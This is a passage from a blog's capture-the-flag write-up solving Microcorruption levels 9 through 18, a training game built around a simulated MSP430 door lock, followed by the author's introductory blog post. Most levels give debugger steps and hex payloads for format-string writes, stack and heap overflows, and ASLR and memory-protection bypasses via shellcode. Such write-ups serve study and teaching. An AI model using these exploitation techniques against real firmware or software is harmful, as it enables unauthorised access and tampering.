be inaccessable from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-1.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 1 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-1  a password, and the
HSM will  return if the password  is correct by setting  a flag in

This is Hardware  Version B.  It contains  the Bluetooth connector
built in, and two available  ports: the LockIT Pro Deadbolt should
be  connected to  port  1,  and the  LockIT  Pro  HSM-1 should  be
connected to port 2.

This is Software Revision 03. We have improved the security of the
lock by ensuring passwords can not be too long.

Break main and type “c”.


Notice the use of “printf”. This means that format string vulnerabilities could be one vector of attack.

Break at the tst instruction (448a) and type “c”.

screenshot 3

At the input prompt don’t type anything and type “c”.

screenshot 2

Notice that the address being tested is 0x3c50
This means we have to write a number to that address in order to skip the jz instruction and call unlock_door.

Testing the format string theory:

Input: 503c%i%n

screenshot 4

A format string attack is possible.
The %n parameter will write the number of characters to 0x503c, hence giving us the non-zero number.
In this case, the %n will write a 2.

Confirming our attack:

Input: 503c2569256e

screenshot 5

Our attack works. Time to solve the challenge.

Password (hex encoded input): 503c2569256e

Type “reset”, “solve”, and enter the password.

screenshot 6


Level 10: Santa Cruz


– A firmware update further rejects passwords which are too long.
– This lock is attached the the LockIT Pro HSM-1.


The LockIT Pro b.05  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communiciate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessable from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-1.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 1 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-1  a password, and the
HSM will  return if the password  is correct by setting  a flag in

This is Hardware  Version B.  It contains  the Bluetooth connector
built in, and two available  ports: the LockIT Pro Deadbolt should
be  connected to  port  1,  and the  LockIT  Pro  HSM-1 should  be
connected to port 2.

This is Software Revision 05.  We have added further mechanisms to
verify that passwords which are too long will be rejected.

Break main and type “c”.

Notice the address of unlock_door is 0x444a

Type “c” enter a username and password and type “c” again.

screenshot 2screenshot 3screenshot 4

Notice the following addresses:
user is at 0x43a2
password at 0x43b5
stack pointer is at 0x43a0
ret address at 0x43cc

Inspect the login function:
Notice the mov.b -0x18(r4), r15 at login’s 0x45e4

Type “read r4-18”:

screenshot 5

The resulting address is 0x43b4 and it has a value of 0x10
Notice the mov.b -0x19(r4), r15 at login’s 0x45fa

Type “read r4-19”:

screenshot 6

The resulting address is 0x43b3 and it has a value of 0x08
Notice the tst.b -0x6(r4) at login’s 0x464c and the jz #0x465e <login+0x10e> at login’s 0x4650

Type “read r4-6”:

screenshot 7

The resulting address is 0x43c6, meaning 0x43c6 must be 0x0
We want to overwrite the ret address with that of unlock_door
We also want to make sure that the value of 0x43b3 is lower than our password length and 0x43b4 is higher than our password length

Use Python to make calculations:
python -c “print 0x43cc – 0x43a2”
The result is 42

python -c “print (’61’ * 17) + ’01’ + (’61’ * 24) + ‘4a44′”
The result will be our username

We want to overwrite the 0x43c6 address with 0x0
python -c “print 0x43c6 – 0x43b5”
The result is 17

python -c “print ’62’ * 17 + ’00′”
The result will be our password

Testing the theory:
user (hex-encoded): 6161616161616161616161616161616161016161616161616161616161616161616161616161616161614a44
pass (hex-encoded): 626262626262626262626262626262626200

screenshot 8

We have our solution and are ready to pass the challenge.

Username (Hex encoded input): 6161616161616161616161616161616161016161616161616161616161616161616161616161616161614a44
Password (Hex encoded input): 626262626262626262626262626262626200

Type “reset”, “solve”, and enter the password.

screenshot 9

Level 11: Jakarta


– A firmware update further rejects passwords which are too long.
– This lock is attached the the LockIT Pro HSM-1.


The LockIT Pro b.06  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communiciate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessable from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-1.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 1 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-1  a password, and the
HSM will  return if the password  is correct by setting  a flag in

This is Hardware  Version B.  It contains  the Bluetooth connector
built in, and two available  ports: the LockIT Pro Deadbolt should
be  connected to  port  1,  and the  LockIT  Pro  HSM-1 should  be
connected to port 2.

This is Software Revision 06.  We have added further mechanisms to
verify that passwords which are too long will be rejected.


Break main and type “c”.


Notice unlock_door is at 0x444c
We will use the interrupt at 4450 to unlock the door.

screenshot 2

Notice the cmp.b #0x21, r11 in login’s 0x45ae
This checks for the username meeting the 0x20 limit

screenshot 3

Notice the add    r11, r15 at 0x45fe and the cmp.b #0x21, r15 at 0x4600
These check for the combined length of user and pass against 0xff

Type “c” and use Python to calculate the username:
python -c “print ’61’ * 32”
Input (hex-encoded): 6161616161616161616161616161616161616161616161616161616161616161

screenshot 4

Type “c” and use Python to calculate the password:
python -c “print ’61’ * 4 + ‘4c44′ + ’62’ * 218”
Input: 616161614c446262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262

Type “c” twice:

screenshot 5

We have our solution and can now pass the challenge.

Username (Hex encoded input): 6161616161616161616161616161616161616161616161616161616161616161

Password (Hex encoded input): 616161614c446262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262

Type “reset”, “solve”, and enter the password.

screenshot 6


Level 12: Novosibirsk


– This lock is attached the the LockIT Pro HSM-2.
– We have added features from b.03 to the new hardware.


The LockIT Pro c.02  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communiciate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessable from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-2.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 2 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-2  a password, and the
HSM will  directly send the  correct unlock message to  the LockIT
Pro Deadbolt  if the password  is correct, otherwise no  action is

This is Hardware  Version C.  It contains  the Bluetooth connector
built in, and two available  ports: the LockIT Pro Deadbolt should
be  connected to  port  1,  and the  LockIT  Pro  HSM-2 should  be
connected to port 2.

This is Software Revision 02. We have improved the security of the
lock by ensuring passwords can not be too long.


Break main and type “c”.


screenshot 2

Notice the printf; there may be a format string vulnerability.

Break at 0x448e, which is a test:
break 448e
Input: aaaa

screenshot 3

Notice that conditional_unlock_door pushes 0x7e to INT at 0x44c6

We want to overwrite it to 0x7f, so that INT 0x7f gets called instead
0x7f = 127

So we can do:
0x44c8 + 125 A’s + %n

The %n will overwrite the 0x7e with 0x7f (127)

Testing the format string theory:
python -c “print ’44c8′ + ‘A’ * 125”


screenshot 4

Our exploit will look like: c844 + (125 A’s) + 256e

Testing our format string theory:
Input (hex-encoded): c8446161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161256e

screenshot 5

We have our solution and can now pass the challenge.

Username (Hex encoded input): c8446161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161256e

Type “reset”, “solve”, and enter the password.

screenshot 6


Level 13: Algiers


– This lock contains the all-new LockIT Pro Account Manager.


The LockIT Pro d.01  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communiciate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessable from the exterior of the building.

LockIT Pro Account Manager solves the problem of sharing passwords
when  multiple users  must  have  access to  a  lock. The  Account
Manager contains  a mapping of users  to PINs, each of  which is 4
digits.  The  system supports  hundreds of users,  each configured
with his or her own PIN,  without degrading the performance of the

There are no accounts set up  on the LockIT Pro Account Manager by
default. An administrator must first initialize the lock with user
accounts  and  their  PINs.  User  accounts  are  by  default  not
authorized  for access,  but can  be authorized  by attaching  the
Account  Manager  Authorizer.  This  prevents  users  from  adding
themselves to the lock during its use.

This is Hardware  Version D.  It contains  the Bluetooth connector
built in, and one available port, to which the LockIT Pro Deadbolt
should be connected. When authorizing PINs, the Deadbolt should be
disconnected and the Authorizer should be attached in its place.

This   is  Software   Revision   01.  It is a  much more  advanced
version of other locks, but the first Version D release.

Break main and type “c” two times.
user: aaaa
pass: bbbb

Notice that we have metadata headers before our input.

The header contains:
(1) Pointer to the previous block
(2) Pointer to the next block
(3) The size of the block
(4) Status of the block; whether it’s allocated or free

We have two blocks, each 16 bytes big, and they’re next to each other.
Also notice that there is no check on the length of input.
This means we can overwrite the header of the second block and make it point to wherever we want.

screenshot 2

Notice that unlock_door is at 0x4564 and free’s ret address is right behind at 0x4562
This means we can use NOPs to slide into unlock_door.

The exploit will look like:
16 A’s + 4444 + 6245 + 0100

Generate the exploit with Python:
python -c “print ’61’ * 16 + ‘4444’+ ‘6245’ + ‘0100’”

Testing the theory:
user (hex-encoded): 61616161616161616161616161616161444462450100
pass: <blank>

screenshot 3

We have our solution and can now pass the challenge.

Username (Hex encoded input): 61616161616161616161616161616161444462450100

Type “reset”, “solve”, and enter the password.

screenshot 4


Level 14: Vladivostok


– Lockitall  developers further used the hardware randomization to
improve lock security.
– This lock is attached the the LockIT Pro HSM-2.


The LockIT Pro c.05  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communiciate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessable from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-2.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 2 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-2  a password, and the
HSM will  directly send the  correct unlock message to  the LockIT
Pro Deadbolt  if the password  is correct, otherwise no  action is

Despite the  year of development  effort which  went in to  it, we
have heard  reports that  the memory  protection introduced  in to
LockIT Pro r e.01 is insufficient. We have removed this feature in
favor of  the tried-and-true HSM-2. The  engineers responsible for
LockIT Pro r e.01 have been sacked.

This is Hardware  Version C.  It contains  the Bluetooth connector
built in, and two available  ports: the LockIT Pro Deadbolt should
be  connected to  port  1,  and the  LockIT  Pro  HSM-2 should  be
connected to port 2.

This is  Software Revision 05.  We have implemented  new state-of-
the-art techniques to prevent any futher lock issues.

Break main and type “c”:


screenshot 2

We see that ASLR is implemented.
Adress Space Layout Randomization is a protection mechanism that guards against buffer overflows by randomizing the location where executables are loaded in memory. What this means is that the addresses to overwrite will always vary.

We can also see printf at 0x476a, which might mean a format string vulnerability.
Also notice the INT at 0x48ec

Calculations for exploit development:
0x48ec – 0x476a = 0x182

Testing the format string theory:
Input: %x%x

screenshot 3screenshot 4

The program is vulnerable to format string attacks.
Also notice how everything was overwritten.

The address of printf is 0x6c56

The password should be:
8 random bytes + (printf_addr + 0x182) + 2 random bytes + 7f00

Write a Python script to get us the password:

screenshot 5

Run the script and test the exploit:
python vladivostok.py

Password (Hex encoded input): 4141414141414141d86d42427f00

screenshot 6

We have our solution and can now pass the challenge.

Type “solve”.

screenshot 7

screenshot 8screenshot 9

Password (Hex encoded input): 41414141414141411e7942427f00

screenshot 10


Level 15: Bangalore


– The lock uses the first MSP430 ever to have memory protection.
– This lock is attached the the LockIT Pro HSM-2.


The LockIT Pro c.01  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communiciate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessable from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-2.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 2 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-2  a password, and the
HSM will  directly send the  correct unlock message to  the LockIT
Pro Deadbolt  if the password  is correct, otherwise no  action is

Lockitall engineers  have worked for  over a year to  bring memory
protection to  the MSP430—a  truly amazing achievement.  Each of
the 256  pages can  either be executable  or writeable,  but never
both, finally  bringing to  a close  some of  the issues  in prior

This  is Hardware  Version  C. It  contains  the all-new  modified
MSP430  with hardware  memory protection.   This hardware  version
also contains the Bluetooth connector  built in, and two available
ports: the LockIT Pro Deadbolt should  be connected to port 1, and
the LockIT Pro HSM-2 should be connected to port 2.

This is Software Revision 01. The new firmware supports the memory
protection we have introduced in this new hardware version.

Break main and type “c”:


Notice this program has Data Execution Prevention (DEP) enabled.
Both the manual and the program shows that pages are either executable or writable.
0x1 makes the page writable and 0x0 makes the page executable.

Type “c” and use Python for input:
python -c “print ’61’ * 20”
Input (hex-encoded): 6161616161616161616161616161616161616161

screenshot 2

Notice our input starts at 0x3fee

python -c “print ’61’ * 16 + ‘ee3f'”
Input (hex-encoded): 61616161616161616161616161616161ee3f

screenshot 3

We get a segmentation fault, saying it cannot execute a write-only page.

We need to set the page where our input is to executable (0x44ba)
The format we will use is:
<shellcode><buffer><mark_page_executable><page num><executable mark><input addr>

This will mark our input page as executable and then execute our shellcode.

Go to the Assembler.
mov       #0xff00, sr
call      #0x10

screenshot 4

Where 0xff00 is 0x8000 + 0x7f00

The assembled objects are: 324000ffb0121000

Use Python to calculate the password:
python -c “print ‘324000ffb0121000′ + ’61’ * 8 + ‘ba44’ + ‘3f00’ + ‘0000’ + ‘ee3f'”

Password (Hex encoded input): 324000ffb01210006161616161616161ba443f000000ee3f

Type “reset”, “solve”, and enter the password.

screenshot 5


Level 16: Lagos


– Passwords may now only contain alphanumeric characters.
– This lock is attached the the LockIT Pro HSM-2.


The LockIT Pro c.04  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communiciate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessable from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-2.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 2 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-2  a password, and the
HSM will  directly send the  correct unlock message to  the LockIT
Pro Deadbolt  if the password  is correct, otherwise no  action is

This is Hardware  Version C.  It contains  the Bluetooth connector
built in, and two available  ports: the LockIT Pro Deadbolt should
be  connected to  port  1,  and the  LockIT  Pro  HSM-2 should  be
connected to port 2.

This is  Software Revision  04. Due to  user confusion  over which
characters passwords may contain,  only alphanumeric passwords are

Note that this level only accepts alphanumeric characters, so we can only use: 0x30-0x39, 0x41-0x5a and 0x61-0x7a

Break main and type “c” twice:
Input: 111122223333


Notice we have a 200-byte space to play with, starting from 0x2400

Type “c”:

screenshot 2

Notice our input starts at 0x43ed, and the return address is at 0x43fe

43fe – 43ed = 17

Our buffer will consist of 17 characters.

We want to call INT 0x7f in order to unlock the door.

screenshot 3

Notice that 0x4654 in getsn is within our limited range and allows us to enter more input that is unconstrained.
We will return to 0x4654, specify the address to write to, the input size and the return address.

Use Python to make the calculations:
python -c “print ’41’ * 17 + ‘5446’ + ‘3044’ * 3”

Input (hex-encoded): 41414141414141414141414141414141415446304430443044

Go to the Assembler.
push #0x7f
call  #0x45fc

screenshot 4

Assembled objects: 30127f00b012fc45

These assembled objects are how we issue the INT to bypass authentication.


screenshot 6

Back in the input prompt:
Input (hex-encoded): 30127f00b012fc45

screenshot 5

We have our solution and can now pass the challenge.

Password (Hex encoded input): 41414141414141414141414141414141415446304430443044
Password (Hex encoded input): 30127f00b012fc45

Type “reset”, “solve”, and enter the password.

screenshot 7


Level 17: Chernobyl


– This lock contains the all-new LockIT Pro Account Manager.


The LockIT Pro d.02  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communiciate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessable from the exterior of the building.

LockIT Pro Account Manager solves the problem of sharing passwords
when  multiple users  must  have  access to  a  lock. The  Account
Manager contains  a mapping of users  to PINs, each of  which is 4
digits.  The  system supports  hundreds of users,  each configured
with his or her own PIN,  without degrading the performance of the

There are no accounts set up  on the LockIT Pro Account Manager by
default. An administrator must first initialize the lock with user
accounts  and  their  PINs.  User  accounts  are  by  default  not
authorized  for access,  but can  be authorized  by attaching  the
Account  Manager  Authorizer.  This  prevents  users  from  adding
themselves to the lock during its use.

This is Hardware  Version D.  It contains  the Bluetooth connector
built in, and one available port, to which the LockIT Pro Deadbolt
should be connected. When authorizing PINs, the Deadbolt should be
disconnected and the Authorizer should be attached in its place.

This   is  Software   Revision   02.  It   contains  the   all-new
vault-manager software.

Break main and type “c” twice:

Input: aaaa bbbb
Input: aaaa bbb

Step through the program:
s …
s …
s …
s …


Notice the stack pointer is just at the start of our name.

Continue stepping through the program.
s …
s …
s …
s …

screenshot 2screenshot 3

0x4ce6:  jnz    #0x4bbe <run+0x58>
0x4bbe is cmp.b    #0x61, r15
0x61 = a

Continue stepping through the program.
s …
s …

screenshot 4screenshot 5

0x4bc2:  jne    #0x4c38 <run+0xd2>
0x4c38 is    cmp.b    #0x6e, r15
0x6e = n

Continue stepping through the program.
s …
s …
s …
s …
s …

screenshot 6

4bdc:    mov.b    @r11, r15

s …

screenshot 7

Notice r15 now holds our first b

Continue stepping through the program.

screenshot 8

The process repeats itself with the pin.

Pay attention to 49cc <get_from_table>. We will be stepping through and examining it.

Break at 49cc and step through it.
break 49cc
s …
s …
s …
s …
s …
s …
s …
s …
s …
s …

screenshot 9

s …

screenshot 10

The hash function gets called.

Notice also that further down, rehash calls both malloc and free.

As in the Algiers level, the key is to manipulate header metadata.
We need to set the backwards pointer (bk) as the destination address, and forward pointer (fd) as the return address.

Note that we can actually chain entries in the program by using “;”, similar to how we would perform command injections in other programs.

There is space for five entries per chain, and the sixth entry will overwrite.
Also important to note is that the new memory chunks are stored right after the last allocated chunk.

Craft a Python script to solve the challenge.

screenshot 11screenshot 12screenshot 13

python chernobyl.py

Password (Hex encoded input): 6e6577203020313b6e6577203820313b6e6577204820313b6e6577205020313b6e657720ca3d0101feff3420313b6e657720ca3da250b9f48a505c51feff3020313b6e6577205820313b6e6577206820313b6e6577207020313b6e6577207820313b6e657720303020313b6e657720303820313b324000ff30401000

Type “reset”, “solve”, and enter the password.

screenshot 14


Level 18: Hollywood


– New randomization improves code security.
– This lock is not attached to any hardware security module.

The LockIT Pro a.04 is the first of a new series of locks. It is
controlled by a MSP430 microcontroller, and is the most advanced
MCU-controlled lock available on the market. The MSP430 is a very
low-power device which allows the LockIT Pro to run in almost any

The LockIT Pro contains a Bluetooth chip allowing it to
communiciate with the LockIT Pro App, allowing the LockIT Pro to
be inaccessable from the exterior of the building.

There is no default password on the LockIT Pro—upon receiving
the LockIT Pro, a new password must be set by connecting it to the
LockIT Pro App and entering a password when prompted, and then
restarting the LockIT Pro using the red button on the back.

This is Hardware Version A. It contains the Bluetooth connector
built in, and one available port to which the LockIT Pro Deadbolt
should be connected.

This is Software Revision 04. Our developers have included a new
hardware random number generator, making it impossible to know
where the password will be. We apologize again for making it too
easy for the password to be recovered. Those responsible for
sacking the engineers who were previously sacked have been sacked.

Everything is randomized, so we have to step through all of the program.

We get the following algorithm that deals with user input:

mov #2600 r5
clr r6
add @r5, r4
swpb r4
xor @r5+, r6
xor r4, r6
xor r6, r4
tst 0x0(r5)
mov sr, r7
and #0x2, r7
rra r7
xor #0x1, r7
swpb    r7
rra r7
sxt r7
swpb    r7
sxt r7
mov #0x4b18, r8
and r7 r8
and #0x47aa, r7
add r7, r8
clr r7
mov r8, r12
cmp #0xfeb1, r4
mov sr, r7
clr r4
cmp #0x9298, r6
and sr, r7
clr r6
rra r7
xor #0x1, r7
swpb r7
rra r7
rra r7
rra r7
rra r7
bis r7, sr
mov #0xff00, sr
call #0x10

We craft a script to generate the key:


Run the script:
ruby hollywood.rb

Password (Hex encoded input): 1220833eef6b

Type “reset”, “solve”, and enter the password.

screenshot 2


— Microcorruption Finished — 


Notes on the CTF: Very fun and educational challenges.The user interface looked great and with the inclusion of the assembler and the manual, you had all you needed to complete the challenges.

First blog post

About this blog – CTF and war game write-ups, exploits, code, and news.

This blog will consist of a series of write-ups of war games and capture the flag competitions I compete in and complete. I will also be posting about some of my exploits, what I’m working on with regards to cyber security, as well as important news.

My main interest is in embedded security. However, I compete and am interested in all aspects of network security. So, expect posts covering the whole cyber security gamut.

In the coming weeks I will be posting some of my complete write-ups, as well as work in progress.

Some of the war games I have completed include:

  1. Bandit
  2. Natas
  3. Narnia
  4. Behemoth
  1. Basic
  2. Realistic
  3. Cryptography
  4. Programming
  5. Steganography
  1. Basic
  2. Realistic
  3. Programming
  4. Javascript
  5. Forensic


I am currently working on:


I will be participating with my CTF team in EkoParty 2016 and a few other CTF competitions later this year. So expect write-ups on these as well.